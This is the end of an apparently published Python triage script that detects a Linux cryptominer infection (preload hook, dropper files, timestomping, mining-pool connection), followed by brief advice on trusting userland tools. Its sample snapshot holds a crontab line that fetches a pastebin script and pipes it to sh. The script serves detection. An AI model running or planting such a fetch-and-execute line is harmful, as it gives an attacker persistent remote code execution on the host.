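           for p in sorted(DROPPER_PATHS & set(snap.files))]
    for path, (mtime, ctime) in snap.times.items():
        if ctime - mtime > TIMESTOMP_DAYS * 86400:
            out.append(("medium", f"mtime predates ctime by more than {TIMESTOMP_DAYS}d: {path}"))
    if POOL in snap.connections:
        out.append(("high", f"connection to private mining pool {POOL}"))
    return out


def triage(snap):
    """All findings as (severity, message) tuples."""
    return preload_findings(snap) + cron_findings(snap) + artifact_findings(snap)


# Constructed snapshot of an infected host, using the post's own paths and paste ID.
INSTALL = 1_552_435_200  # constructed install time: 2019-03-13 00:00 UTC
SAMPLE = HostSnapshot(
    files={
        "/etc/ld.so.preload": "/usr/local/lib/libcset.so\n",
        "/usr/sbin/kthrotlds": "<elf bytes>",
        "/tmp/.lsdpid": "4242\n",
        "/etc/init.d/netdns": "#!/bin/sh\n",
    },
    crontab=[
        "*/10 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh",
        "0 3 * * * /usr/local/bin/backup.sh",
    ],
    times={
        "/usr/sbin/kthrotlds": (INSTALL - 416 * 86400, INSTALL),
        "/usr/local/bin/backup.sh": (INSTALL - 3600, INSTALL - 3600),
    },
    connections=["134.209.104.20:51640"],
)

if __name__ == "__main__":
    for severity, msg in triage(SAMPLE):
        print(f"[{severity}] {msg}")
```

The checks are deliberately content-free: they do not depend on the dropper's hash, which changes with every rebuild, but on the places the dropper has to touch to get persistence and hiding. Note that on a host where the libcset.so hook is already loaded, userland tools such as ps and ls may lie; reading /proc directly or examining the disk from a clean system gives a more trustworthy snapshot.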